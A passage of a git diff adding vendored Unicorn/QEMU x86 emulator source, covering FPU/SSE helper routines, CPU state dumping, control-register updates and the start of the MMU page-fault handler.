0x400; + } else { + ST0 = double_to_floatx80(env, sin(fptemp)); + fpush(env); + ST0 = double_to_floatx80(env, cos(fptemp)); + env->fpus &= ~0x400; /* C2 <-- 0 */ + /* the above code is for |arg| < 2**63 only */ + } +} + +void helper_frndint(CPUX86State *env) +{ + ST0 = floatx80_round_to_int(ST0, &env->fp_status); +} + +void helper_fscale(CPUX86State *env) +{ + if (floatx80_is_any_nan(ST1)) { + ST0 = ST1; + } else { + 
int n = floatx80_to_int32_round_to_zero(ST1, &env->fp_status); + ST0 = floatx80_scalbn(ST0, n, &env->fp_status); + } +} + +void helper_fsin(CPUX86State *env) +{ + double fptemp = floatx80_to_double(env, ST0); + + if ((fptemp > MAXTAN) || (fptemp < -MAXTAN)) { + env->fpus |= 0x400; + } else { + ST0 = double_to_floatx80(env, sin(fptemp)); + env->fpus &= ~0x400; /* C2 <-- 0 */ + /* the above code is for |arg| < 2**53 only */ + } +} + +void helper_fcos(CPUX86State *env) +{ + double fptemp = floatx80_to_double(env, ST0); + + if ((fptemp > MAXTAN) || (fptemp < -MAXTAN)) { + env->fpus |= 0x400; + } else { + ST0 = double_to_floatx80(env, cos(fptemp)); + env->fpus &= ~0x400; /* C2 <-- 0 */ + /* the above code is for |arg| < 2**63 only */ + } +} + +void helper_fxam_ST0(CPUX86State *env) +{ + CPU_LDoubleU temp; + int expdif; + + temp.d = ST0; + + env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ + if (SIGND(temp)) { + env->fpus |= 0x200; /* C1 <-- 1 */ + } + + /* XXX: test fptags too */ + expdif = EXPD(temp); + if (expdif == MAXEXPD) { + if (MANTD(temp) == 0x8000000000000000ULL) { + env->fpus |= 0x500; /* Infinity */ + } else { + env->fpus |= 0x100; /* NaN */ + } + } else if (expdif == 0) { + if (MANTD(temp) == 0) { + env->fpus |= 0x4000; /* Zero */ + } else { + env->fpus |= 0x4400; /* Denormal */ + } + } else { + env->fpus |= 0x400; + } +} + +void helper_fstenv(CPUX86State *env, target_ulong ptr, int data32) +{ + int fpus, fptag, exp, i; + uint64_t mant; + CPU_LDoubleU tmp; + + fpus = (env->fpus & ~0x3800) | (env->fpstt & 0x7) << 11; + fptag = 0; + for (i = 7; i >= 0; i--) { + fptag <<= 2; + if (env->fptags[i]) { + fptag |= 3; + } else { + tmp.d = env->fpregs[i].d; + exp = EXPD(tmp); + mant = MANTD(tmp); + if (exp == 0 && mant == 0) { + /* zero */ + fptag |= 1; + } else if (exp == 0 || exp == MAXEXPD + || (mant & (1ULL << 63)) == 0) { + /* NaNs, infinity, denormal */ + fptag |= 2; + } + } + } + + if (data32) { + /* 32 bit */ + cpu_stl_data(env, ptr, env->fpuc); + 
cpu_stl_data(env, ptr + 4, fpus); + cpu_stl_data(env, ptr + 8, fptag); + cpu_stl_data(env, ptr + 12, (uint32_t)env->fpip); /* fpip */ + cpu_stl_data(env, ptr + 16, 0); /* fpcs */ + cpu_stl_data(env, ptr + 20, 0); /* fpoo */ + cpu_stl_data(env, ptr + 24, 0); /* fpos */ + } else { + /* 16 bit */ + cpu_stw_data(env, ptr, env->fpuc); + cpu_stw_data(env, ptr + 2, fpus); + cpu_stw_data(env, ptr + 4, fptag); + cpu_stw_data(env, ptr + 6, (uint32_t)env->fpip); + cpu_stw_data(env, ptr + 8, 0); + cpu_stw_data(env, ptr + 10, 0); + cpu_stw_data(env, ptr + 12, 0); + } + +} + +void helper_fldenv(CPUX86State *env, target_ulong ptr, int data32) +{ + int i, fpus, fptag; + + if (data32) { + cpu_set_fpuc(env, cpu_lduw_data(env, ptr)); + fpus = cpu_lduw_data(env, ptr + 4); + fptag = cpu_lduw_data(env, ptr + 8); + } else { + cpu_set_fpuc(env, cpu_lduw_data(env, ptr)); + fpus = cpu_lduw_data(env, ptr + 2); + fptag = cpu_lduw_data(env, ptr + 4); + } + env->fpstt = (fpus >> 11) & 7; + env->fpus = fpus & ~0x3800; + for (i = 0; i < 8; i++) { + env->fptags[i] = ((fptag & 3) == 3); + fptag >>= 2; + } +} + +void helper_fsave(CPUX86State *env, target_ulong ptr, int data32) +{ + floatx80 tmp; + int i; + + helper_fstenv(env, ptr, data32); + + ptr += (14 << data32); + for (i = 0; i < 8; i++) { + tmp = ST(i); + helper_fstt(env, tmp, ptr); + ptr += 10; + } + + /* fninit */ + env->fpus = 0; + env->fpstt = 0; + cpu_set_fpuc(env, 0x37f); + env->fptags[0] = 1; + env->fptags[1] = 1; + env->fptags[2] = 1; + env->fptags[3] = 1; + env->fptags[4] = 1; + env->fptags[5] = 1; + env->fptags[6] = 1; + env->fptags[7] = 1; +} + +void helper_frstor(CPUX86State *env, target_ulong ptr, int data32) +{ + floatx80 tmp; + int i; + + helper_fldenv(env, ptr, data32); + ptr += (14 << data32); + + for (i = 0; i < 8; i++) { + tmp = helper_fldt(env, ptr); + ST(i) = tmp; + ptr += 10; + } +} + +#if defined(CONFIG_USER_ONLY) +void cpu_x86_fsave(CPUX86State *env, target_ulong ptr, int data32) +{ + helper_fsave(env, ptr, data32); +} 
+ +void cpu_x86_frstor(CPUX86State *env, target_ulong ptr, int data32) +{ + helper_frstor(env, ptr, data32); +} +#endif + +void helper_fxsave(CPUX86State *env, target_ulong ptr, int data64) +{ + int fpus, fptag, i, nb_xmm_regs; + floatx80 tmp; + target_ulong addr; + + /* The operand must be 16 byte aligned */ + if (ptr & 0xf) { + raise_exception(env, EXCP0D_GPF); + } + + fpus = (env->fpus & ~0x3800) | (env->fpstt & 0x7) << 11; + fptag = 0; + for (i = 0; i < 8; i++) { + fptag |= (env->fptags[i] << i); + } + cpu_stw_data(env, ptr, env->fpuc); + cpu_stw_data(env, ptr + 2, fpus); + cpu_stw_data(env, ptr + 4, fptag ^ 0xff); +#ifdef TARGET_X86_64 + if (data64) { + cpu_stq_data(env, ptr + 0x08, 0); /* rip */ + cpu_stq_data(env, ptr + 0x10, 0); /* rdp */ + } else +#endif + { + cpu_stl_data(env, ptr + 0x08, 0); /* eip */ + cpu_stl_data(env, ptr + 0x0c, 0); /* sel */ + cpu_stl_data(env, ptr + 0x10, 0); /* dp */ + cpu_stl_data(env, ptr + 0x14, 0); /* sel */ + } + + addr = ptr + 0x20; + for (i = 0; i < 8; i++) { + tmp = ST(i); + helper_fstt(env, tmp, addr); + addr += 16; + } + + if (env->cr[4] & CR4_OSFXSR_MASK) { + /* XXX: finish it */ + cpu_stl_data(env, ptr + 0x18, env->mxcsr); /* mxcsr */ + cpu_stl_data(env, ptr + 0x1c, 0x0000ffff); /* mxcsr_mask */ + if (env->hflags & HF_CS64_MASK) { + nb_xmm_regs = 16; + } else { + nb_xmm_regs = 8; + } + addr = ptr + 0xa0; + /* Fast FXSAVE leaves out the XMM registers */ + if (!(env->efer & MSR_EFER_FFXSR) + || (env->hflags & HF_CPL_MASK) + || !(env->hflags & HF_LMA_MASK)) { + for (i = 0; i < nb_xmm_regs; i++) { + cpu_stq_data(env, addr, env->xmm_regs[i].XMM_Q(0)); + cpu_stq_data(env, addr + 8, env->xmm_regs[i].XMM_Q(1)); + addr += 16; + } + } + } +} + +void helper_fxrstor(CPUX86State *env, target_ulong ptr, int data64) +{ + int i, fpus, fptag, nb_xmm_regs; + floatx80 tmp; + target_ulong addr; + + /* The operand must be 16 byte aligned */ + if (ptr & 0xf) { + raise_exception(env, EXCP0D_GPF); + } + + cpu_set_fpuc(env, cpu_lduw_data(env, 
ptr)); + fpus = cpu_lduw_data(env, ptr + 2); + fptag = cpu_lduw_data(env, ptr + 4); + env->fpstt = (fpus >> 11) & 7; + env->fpus = fpus & ~0x3800; + fptag ^= 0xff; + for (i = 0; i < 8; i++) { + env->fptags[i] = ((fptag >> i) & 1); + } + + addr = ptr + 0x20; + for (i = 0; i < 8; i++) { + tmp = helper_fldt(env, addr); + ST(i) = tmp; + addr += 16; + } + + if (env->cr[4] & CR4_OSFXSR_MASK) { + /* XXX: finish it */ + cpu_set_mxcsr(env, cpu_ldl_data(env, ptr + 0x18)); + /* cpu_ldl_data(env, ptr + 0x1c); */ + if (env->hflags & HF_CS64_MASK) { + nb_xmm_regs = 16; + } else { + nb_xmm_regs = 8; + } + addr = ptr + 0xa0; + /* Fast FXRESTORE leaves out the XMM registers */ + if (!(env->efer & MSR_EFER_FFXSR) + || (env->hflags & HF_CPL_MASK) + || !(env->hflags & HF_LMA_MASK)) { + for (i = 0; i < nb_xmm_regs; i++) { + env->xmm_regs[i].XMM_Q(0) = cpu_ldq_data(env, addr); + env->xmm_regs[i].XMM_Q(1) = cpu_ldq_data(env, addr + 8); + addr += 16; + } + } + } +} + +void cpu_get_fp80(uint64_t *pmant, uint16_t *pexp, floatx80 f) +{ + CPU_LDoubleU temp; + + temp.d = f; + *pmant = temp.l.lower; + *pexp = temp.l.upper; +} + +floatx80 cpu_set_fp80(uint64_t mant, uint16_t upper) +{ + CPU_LDoubleU temp; + + temp.l.upper = upper; + temp.l.lower = mant; + return temp.d; +} + +/* MMX/SSE */ +/* XXX: optimize by storing fptt and fptags in the static cpu state */ + +#define SSE_DAZ 0x0040 +#define SSE_RC_MASK 0x6000 +#define SSE_RC_NEAR 0x0000 +#define SSE_RC_DOWN 0x2000 +#define SSE_RC_UP 0x4000 +#define SSE_RC_CHOP 0x6000 +#define SSE_FZ 0x8000 + +void cpu_set_mxcsr(CPUX86State *env, uint32_t mxcsr) +{ + int rnd_type; + + env->mxcsr = mxcsr; + + /* set rounding mode */ + switch (mxcsr & SSE_RC_MASK) { + default: + case SSE_RC_NEAR: + rnd_type = float_round_nearest_even; + break; + case SSE_RC_DOWN: + rnd_type = float_round_down; + break; + case SSE_RC_UP: + rnd_type = float_round_up; + break; + case SSE_RC_CHOP: + rnd_type = float_round_to_zero; + break; + } + set_float_rounding_mode(rnd_type, 
&env->sse_status); + + /* set denormals are zero */ + set_flush_inputs_to_zero((mxcsr & SSE_DAZ) ? 1 : 0, &env->sse_status); + + /* set flush to zero */ + set_flush_to_zero((mxcsr & SSE_FZ) ? 1 : 0, &env->fp_status); +} + +void cpu_set_fpuc(CPUX86State *env, uint16_t val) +{ + env->fpuc = val; + update_fp_status(env); +} + +void helper_ldmxcsr(CPUX86State *env, uint32_t val) +{ + cpu_set_mxcsr(env, val); +} + +void helper_enter_mmx(CPUX86State *env) +{ + env->fpstt = 0; + *(uint32_t *)(env->fptags) = 0; + *(uint32_t *)(env->fptags + 4) = 0; +} + +void helper_emms(CPUX86State *env) +{ + /* set to empty state */ + *(uint32_t *)(env->fptags) = 0x01010101; + *(uint32_t *)(env->fptags + 4) = 0x01010101; +} + +/* XXX: suppress */ +void helper_movq(CPUX86State *env, void *d, void *s) +{ + *(uint64_t *)d = *(uint64_t *)s; +} + +#define SHIFT 0 +#include "ops_sse.h" + +#define SHIFT 1 +#include "ops_sse.h" diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/helper.c new file mode 100644 index 0000000..c2fba8e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/helper.c @@ -0,0 +1,1152 @@ +/* + * i386 helpers (without register variable usage) + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ + +#include "cpu.h" +#ifndef CONFIG_USER_ONLY +#include "sysemu/sysemu.h" +#endif + +//#define DEBUG_MMU + +static void cpu_x86_version(CPUX86State *env, int *family, int *model) +{ + int cpuver = env->cpuid_version; + + if (family == NULL || model == NULL) { + return; + } + + *family = (cpuver >> 8) & 0x0f; + *model = ((cpuver >> 12) & 0xf0) + ((cpuver >> 4) & 0x0f); +} + +/* Broadcast MCA signal for processor version 06H_EH and above */ +int cpu_x86_support_mca_broadcast(CPUX86State *env) +{ + int family = 0; + int model = 0; + + cpu_x86_version(env, &family, &model); + if ((family == 6 && model >= 14) || family > 6) { + return 1; + } + + return 0; +} + +/***********************************************************/ +/* x86 debug */ + +static const char *cc_op_str[CC_OP_NB] = { + "DYNAMIC", + "EFLAGS", + + "MULB", + "MULW", + "MULL", + "MULQ", + + "ADDB", + "ADDW", + "ADDL", + "ADDQ", + + "ADCB", + "ADCW", + "ADCL", + "ADCQ", + + "SUBB", + "SUBW", + "SUBL", + "SUBQ", + + "SBBB", + "SBBW", + "SBBL", + "SBBQ", + + "LOGICB", + "LOGICW", + "LOGICL", + "LOGICQ", + + "INCB", + "INCW", + "INCL", + "INCQ", + + "DECB", + "DECW", + "DECL", + "DECQ", + + "SHLB", + "SHLW", + "SHLL", + "SHLQ", + + "SARB", + "SARW", + "SARL", + "SARQ", + + "BMILGB", + "BMILGW", + "BMILGL", + "BMILGQ", + + "ADCX", + "ADOX", + "ADCOX", + + "CLR", +}; + +static void +cpu_x86_dump_seg_cache(CPUX86State *env, FILE *f, fprintf_function cpu_fprintf, + const char *name, struct SegmentCache *sc) +{ +#ifdef TARGET_X86_64 + if (env->hflags & HF_CS64_MASK) { + cpu_fprintf(f, "%-3s=%04x %016" PRIx64 " %08x %08x", name, + sc->selector, sc->base, sc->limit, sc->flags & 0x00ffff00); + } else +#endif + { + cpu_fprintf(f, "%-3s=%04x %08x %08x %08x", name, sc->selector, + (uint32_t)sc->base, sc->limit, sc->flags & 0x00ffff00); + } + + if (!(env->hflags & HF_PE_MASK) || !(sc->flags & DESC_P_MASK)) + goto done; + + cpu_fprintf(f, " DPL=%d ", (sc->flags & DESC_DPL_MASK) >> DESC_DPL_SHIFT); + if (sc->flags & 
DESC_S_MASK) { + if (sc->flags & DESC_CS_MASK) { + cpu_fprintf(f, (sc->flags & DESC_L_MASK) ? "CS64" : + ((sc->flags & DESC_B_MASK) ? "CS32" : "CS16")); + cpu_fprintf(f, " [%c%c", (sc->flags & DESC_C_MASK) ? 'C' : '-', + (sc->flags & DESC_R_MASK) ? 'R' : '-'); + } else { + cpu_fprintf(f, + (sc->flags & DESC_B_MASK || env->hflags & HF_LMA_MASK) + ? "DS " : "DS16"); + cpu_fprintf(f, " [%c%c", (sc->flags & DESC_E_MASK) ? 'E' : '-', + (sc->flags & DESC_W_MASK) ? 'W' : '-'); + } + cpu_fprintf(f, "%c]", (sc->flags & DESC_A_MASK) ? 'A' : '-'); + } else { + static const char *sys_type_name[2][16] = { + { /* 32 bit mode */ + "Reserved", "TSS16-avl", "LDT", "TSS16-busy", + "CallGate16", "TaskGate", "IntGate16", "TrapGate16", + "Reserved", "TSS32-avl", "Reserved", "TSS32-busy", + "CallGate32", "Reserved", "IntGate32", "TrapGate32" + }, + { /* 64 bit mode */ + "", "Reserved", "LDT", "Reserved", "Reserved", + "Reserved", "Reserved", "Reserved", "Reserved", + "TSS64-avl", "Reserved", "TSS64-busy", "CallGate64", + "Reserved", "IntGate64", "TrapGate64" + } + }; + cpu_fprintf(f, "%s", + sys_type_name[(env->hflags & HF_LMA_MASK) ? 
1 : 0] + [(sc->flags & DESC_TYPE_MASK) + >> DESC_TYPE_SHIFT]); + } +done: + cpu_fprintf(f, "\n"); +} + +#define DUMP_CODE_BYTES_TOTAL 50 +#define DUMP_CODE_BYTES_BACKWARD 20 + +void x86_cpu_dump_state(CPUState *cs, FILE *f, fprintf_function cpu_fprintf, + int flags) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + int eflags, i, nb; + char cc_op_name[32]; + static const char *seg_name[6] = { "ES", "CS", "SS", "DS", "FS", "GS" }; + + eflags = cpu_compute_eflags(env); +#ifdef TARGET_X86_64 + if (env->hflags & HF_CS64_MASK) { + cpu_fprintf(f, + "RAX=%016" PRIx64 " RBX=%016" PRIx64 " RCX=%016" PRIx64 " RDX=%016" PRIx64 "\n" + "RSI=%016" PRIx64 " RDI=%016" PRIx64 " RBP=%016" PRIx64 " RSP=%016" PRIx64 "\n" + "R8 =%016" PRIx64 " R9 =%016" PRIx64 " R10=%016" PRIx64 " R11=%016" PRIx64 "\n" + "R12=%016" PRIx64 " R13=%016" PRIx64 " R14=%016" PRIx64 " R15=%016" PRIx64 "\n" + "RIP=%016" PRIx64 " RFL=%08x [%c%c%c%c%c%c%c] CPL=%d II=%d A20=%d SMM=%d HLT=%d\n", + env->regs[R_EAX], + env->regs[R_EBX], + env->regs[R_ECX], + env->regs[R_EDX], + env->regs[R_ESI], + env->regs[R_EDI], + env->regs[R_EBP], + env->regs[R_ESP], + env->regs[8], + env->regs[9], + env->regs[10], + env->regs[11], + env->regs[12], + env->regs[13], + env->regs[14], + env->regs[15], + env->eip, eflags, + eflags & DF_MASK ? 'D' : '-', + eflags & CC_O ? 'O' : '-', + eflags & CC_S ? 'S' : '-', + eflags & CC_Z ? 'Z' : '-', + eflags & CC_A ? 'A' : '-', + eflags & CC_P ? 'P' : '-', + eflags & CC_C ? 
'C' : '-', + env->hflags & HF_CPL_MASK, + (env->hflags >> HF_INHIBIT_IRQ_SHIFT) & 1, + (env->a20_mask >> 20) & 1, + (env->hflags >> HF_SMM_SHIFT) & 1, + cs->halted); + } else +#endif + { + cpu_fprintf(f, "EAX=%08x EBX=%08x ECX=%08x EDX=%08x\n" + "ESI=%08x EDI=%08x EBP=%08x ESP=%08x\n" + "EIP=%08x EFL=%08x [%c%c%c%c%c%c%c] CPL=%d II=%d A20=%d SMM=%d HLT=%d\n", + (uint32_t)env->regs[R_EAX], + (uint32_t)env->regs[R_EBX], + (uint32_t)env->regs[R_ECX], + (uint32_t)env->regs[R_EDX], + (uint32_t)env->regs[R_ESI], + (uint32_t)env->regs[R_EDI], + (uint32_t)env->regs[R_EBP], + (uint32_t)env->regs[R_ESP], + (uint32_t)env->eip, eflags, + eflags & DF_MASK ? 'D' : '-', + eflags & CC_O ? 'O' : '-', + eflags & CC_S ? 'S' : '-', + eflags & CC_Z ? 'Z' : '-', + eflags & CC_A ? 'A' : '-', + eflags & CC_P ? 'P' : '-', + eflags & CC_C ? 'C' : '-', + env->hflags & HF_CPL_MASK, + (env->hflags >> HF_INHIBIT_IRQ_SHIFT) & 1, + (env->a20_mask >> 20) & 1, + (env->hflags >> HF_SMM_SHIFT) & 1, + cs->halted); + } + + for(i = 0; i < 6; i++) { + cpu_x86_dump_seg_cache(env, f, cpu_fprintf, seg_name[i], + &env->segs[i]); + } + cpu_x86_dump_seg_cache(env, f, cpu_fprintf, "LDT", &env->ldt); + cpu_x86_dump_seg_cache(env, f, cpu_fprintf, "TR", &env->tr); + +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + cpu_fprintf(f, "GDT= %016" PRIx64 " %08x\n", + env->gdt.base, env->gdt.limit); + cpu_fprintf(f, "IDT= %016" PRIx64 " %08x\n", + env->idt.base, env->idt.limit); + cpu_fprintf(f, "CR0=%08x CR2=%016" PRIx64 " CR3=%016" PRIx64 " CR4=%08x\n", + (uint32_t)env->cr[0], + env->cr[2], + env->cr[3], + (uint32_t)env->cr[4]); + for(i = 0; i < 4; i++) + cpu_fprintf(f, "DR%d=%016" PRIx64 " ", i, env->dr[i]); + cpu_fprintf(f, "\nDR6=%016" PRIx64 " DR7=%016" PRIx64 "\n", + env->dr[6], env->dr[7]); + } else +#endif + { + cpu_fprintf(f, "GDT= %08x %08x\n", + (uint32_t)env->gdt.base, env->gdt.limit); + cpu_fprintf(f, "IDT= %08x %08x\n", + (uint32_t)env->idt.base, env->idt.limit); + cpu_fprintf(f, "CR0=%08x 
CR2=%08x CR3=%08x CR4=%08x\n", + (uint32_t)env->cr[0], + (uint32_t)env->cr[2], + (uint32_t)env->cr[3], + (uint32_t)env->cr[4]); + for(i = 0; i < 4; i++) { + cpu_fprintf(f, "DR%d=" TARGET_FMT_lx " ", i, env->dr[i]); + } + cpu_fprintf(f, "\nDR6=" TARGET_FMT_lx " DR7=" TARGET_FMT_lx "\n", + env->dr[6], env->dr[7]); + } + if (flags & CPU_DUMP_CCOP) { + if ((unsigned)env->cc_op < CC_OP_NB) + snprintf(cc_op_name, sizeof(cc_op_name), "%s", cc_op_str[env->cc_op]); + else + snprintf(cc_op_name, sizeof(cc_op_name), "[%d]", env->cc_op); +#ifdef TARGET_X86_64 + if (env->hflags & HF_CS64_MASK) { + cpu_fprintf(f, "CCS=%016" PRIx64 " CCD=%016" PRIx64 " CCO=%-8s\n", + env->cc_src, env->cc_dst, + cc_op_name); + } else +#endif + { + cpu_fprintf(f, "CCS=%08x CCD=%08x CCO=%-8s\n", + (uint32_t)env->cc_src, (uint32_t)env->cc_dst, + cc_op_name); + } + } + cpu_fprintf(f, "EFER=%016" PRIx64 "\n", env->efer); + if (flags & CPU_DUMP_FPU) { + int fptag; + fptag = 0; + for(i = 0; i < 8; i++) { + fptag |= ((!env->fptags[i]) << i); + } + cpu_fprintf(f, "FCW=%04x FSW=%04x [ST=%d] FTW=%02x MXCSR=%08x\n", + env->fpuc, + (env->fpus & ~0x3800) | (env->fpstt & 0x7) << 11, + env->fpstt, + fptag, + env->mxcsr); + for(i=0;i<8;i++) { + CPU_LDoubleU u; + u.d = env->fpregs[i].d; + cpu_fprintf(f, "FPR%d=%016" PRIx64 " %04x", + i, u.l.lower, u.l.upper); + if ((i & 1) == 1) + cpu_fprintf(f, "\n"); + else + cpu_fprintf(f, " "); + } + if (env->hflags & HF_CS64_MASK) + nb = 16; + else + nb = 8; + for(i=0;ixmm_regs[i].XMM_L(3), + env->xmm_regs[i].XMM_L(2), + env->xmm_regs[i].XMM_L(1), + env->xmm_regs[i].XMM_L(0)); + if ((i & 1) == 1) + cpu_fprintf(f, "\n"); + else + cpu_fprintf(f, " "); + } + } + if (flags & CPU_DUMP_CODE) { + target_ulong base = env->segs[R_CS].base + env->eip; + target_ulong offs = MIN(env->eip, DUMP_CODE_BYTES_BACKWARD); + uint8_t code; + char codestr[3]; + + cpu_fprintf(f, "Code="); + for (i = 0; i < DUMP_CODE_BYTES_TOTAL; i++) { + if (cpu_memory_rw_debug(cs, base - offs + i, &code, 1, 0) == 
0) { + snprintf(codestr, sizeof(codestr), "%02x", code); + } else { + snprintf(codestr, sizeof(codestr), "??"); + } + cpu_fprintf(f, "%s%s%s%s", i > 0 ? " " : "", + i == offs ? "<" : "", codestr, i == offs ? ">" : ""); + } + cpu_fprintf(f, "\n"); + } +} + +/***********************************************************/ +/* x86 mmu */ +/* XXX: add PGE support */ + +void x86_cpu_set_a20(X86CPU *cpu, int a20_state) +{ + CPUX86State *env = &cpu->env; + + a20_state = (a20_state != 0); + if (a20_state != ((env->a20_mask >> 20) & 1)) { + CPUState *cs = CPU(cpu); + +#if defined(DEBUG_MMU) + printf("A20 update: a20=%d\n", a20_state); +#endif + /* if the cpu is currently executing code, we must unlink it and + all the potentially executing TB */ + cpu_interrupt(cs, CPU_INTERRUPT_EXITTB); + + /* when a20 is changed, all the MMU mappings are invalid, so + we must flush everything */ + tlb_flush(cs, 1); + env->a20_mask = ~(1 << 20) | (a20_state << 20); + } +} + +void cpu_x86_update_cr0(CPUX86State *env, uint32_t new_cr0) +{ + X86CPU *cpu = x86_env_get_cpu(env); + int pe_state; + +#if defined(DEBUG_MMU) + printf("CR0 update: CR0=0x%08x\n", new_cr0); +#endif + if ((new_cr0 & (CR0_PG_MASK | CR0_WP_MASK | CR0_PE_MASK)) != + (env->cr[0] & (CR0_PG_MASK | CR0_WP_MASK | CR0_PE_MASK))) { + tlb_flush(CPU(cpu), 1); + } + +#ifdef TARGET_X86_64 + if (!(env->cr[0] & CR0_PG_MASK) && (new_cr0 & CR0_PG_MASK) && + (env->efer & MSR_EFER_LME)) { + /* enter in long mode */ + /* XXX: generate an exception */ + if (!(env->cr[4] & CR4_PAE_MASK)) + return; + env->efer |= MSR_EFER_LMA; + env->hflags |= HF_LMA_MASK; + } else if ((env->cr[0] & CR0_PG_MASK) && !(new_cr0 & CR0_PG_MASK) && + (env->efer & MSR_EFER_LMA)) { + /* exit long mode */ + env->efer &= ~MSR_EFER_LMA; + env->hflags &= ~(HF_LMA_MASK | HF_CS64_MASK); + env->eip &= 0xffffffff; + } +#endif + env->cr[0] = new_cr0 | CR0_ET_MASK; + + /* update PE flag in hidden flags */ + pe_state = (env->cr[0] & CR0_PE_MASK); + env->hflags = (env->hflags & 
~HF_PE_MASK) | (pe_state << HF_PE_SHIFT); + /* ensure that ADDSEG is always set in real mode */ + env->hflags |= ((pe_state ^ 1) << HF_ADDSEG_SHIFT); + /* update FPU flags */ + env->hflags = (env->hflags & ~(HF_MP_MASK | HF_EM_MASK | HF_TS_MASK)) | + ((new_cr0 << (HF_MP_SHIFT - 1)) & (HF_MP_MASK | HF_EM_MASK | HF_TS_MASK)); +} + +/* XXX: in legacy PAE mode, generate a GPF if reserved bits are set in + the PDPT */ +void cpu_x86_update_cr3(CPUX86State *env, target_ulong new_cr3) +{ + X86CPU *cpu = x86_env_get_cpu(env); + + env->cr[3] = new_cr3; + if (env->cr[0] & CR0_PG_MASK) { +#if defined(DEBUG_MMU) + printf("CR3 update: CR3=" TARGET_FMT_lx "\n", new_cr3); +#endif + tlb_flush(CPU(cpu), 0); + } +} + +void cpu_x86_update_cr4(CPUX86State *env, uint32_t new_cr4) +{ + X86CPU *cpu = x86_env_get_cpu(env); + +#if defined(DEBUG_MMU) + printf("CR4 update: CR4=%08x\n", (uint32_t)env->cr[4]); +#endif + if ((new_cr4 ^ env->cr[4]) & + (CR4_PGE_MASK | CR4_PAE_MASK | CR4_PSE_MASK | + CR4_SMEP_MASK | CR4_SMAP_MASK)) { + tlb_flush(CPU(cpu), 1); + } + /* SSE handling */ + if (!(env->features[FEAT_1_EDX] & CPUID_SSE)) { + new_cr4 &= ~CR4_OSFXSR_MASK; + } + env->hflags &= ~HF_OSFXSR_MASK; + if (new_cr4 & CR4_OSFXSR_MASK) { + env->hflags |= HF_OSFXSR_MASK; + } + + if (!(env->features[FEAT_7_0_EBX] & CPUID_7_0_EBX_SMAP)) { + new_cr4 &= ~CR4_SMAP_MASK; + } + env->hflags &= ~HF_SMAP_MASK; + if (new_cr4 & CR4_SMAP_MASK) { + env->hflags |= HF_SMAP_MASK; + } + + env->cr[4] = new_cr4; +} + +#if defined(CONFIG_USER_ONLY) + +int x86_cpu_handle_mmu_fault(CPUState *cs, vaddr addr, + int is_write, int mmu_idx) +{ + X86CPU *cpu = X86_CPU(cs); + CPUX86State *env = &cpu->env; + + /* user mode only emulation */ + is_write &= 1; + env->cr[2] = addr; + env->error_code = (is_write << PG_ERROR_W_BIT); + env->error_code |= PG_ERROR_U_MASK; + cs->exception_index = EXCP0E_PAGE; + return 1; +} + +#else + +/* return value: + * -1 = cannot handle fault + * 0 = nothing more to do + * 1 = generate PF fault + */ 
+int x86_cpu_handle_mmu_fault(CPUState *cs, vaddr addr, + int is_write1, int mmu_idx) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + uint64_t ptep, pte; + target_ulong pde_addr, pte_addr; + int error_code = 0; + int is_dirty, prot, page_size, is_write, is_user; + hwaddr paddr; + uint64_t rsvd_mask = PG_HI_RSVD_MASK; + //uint32_t page_offset; + target_ulong vaddr; + + is_user = mmu_idx == MMU_USER_IDX; +#if defined(DEBUG_MMU) + printf("MMU fault: addr=%" VADDR_PRIx " w=%d u=%d eip=" TARGET_FMT_lx "\n", + addr, is_write1, is_user, env->eip); +#endif + is_write = is_write1 & 1; + + if (!(env->cr[0] & CR0_PG_MASK)) { + pte = addr; +#ifdef TARGET_X86_64 + if (!(env->hflags & HF_LMA_MASK)) { + /* Without long mode we can only address 32bits in real mode */ + pte = (uint32_t)pte; + } +#endif + prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; + page_size = 4096; + goto do_mapping; + } + + if (!(env->efer & MSR_EFER_NXE)) { + rsvd_mask |= PG_NX_MASK; + } + + if (env->cr[4] & CR4_PAE_MASK) { + uint64_t pde, pdpe; + target_ulong pdpe_addr; + +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + uint64_t pml4e_addr, pml4e; + int32_t sext; + + /* test virtual address sign extension */ + sext = (int64_t)addr >> 47; + if (sext != 0 && sext != -1) { + env->error_code = 0; + cs->exception_index = EXCP0D_GPF; + return 1; + } + + pml4e_addr = ((env->cr[3] & ~0xfff) + (((addr >> 39) & 0x1ff) << 3)) & + env->a20_mask; + pml4e = ldq_phys(cs->as, pml4e_addr); + if (!(pml4e & PG_PRESENT_MASK)) { + goto do_fault; + } + if (pml4e & (rsvd_mask | PG_PSE_MASK)) { + goto do_fault_rsvd; + } + if (!(pml4e & PG_ACCESSED_MASK)) { + pml4e |= PG_ACCESSED_MASK; + stl_phys_notdirty(cs->as, pml4e_addr, pml4e); + } + ptep = pml4e ^ PG_NX_MASK; + pdpe_addr = ((pml4e & PG_ADDRESS_MASK) + (((addr >> 30) & 0x1ff) << 3)) & + env->a20_mask; + pdpe = ldq_phys(cs->as, pdpe_addr); + if (!(pdpe & PG_PRESENT_MASK)) { + goto do_fault; + } + if (pdpe & rsvd_mask) { + goto do_fault_rsvd; + } 
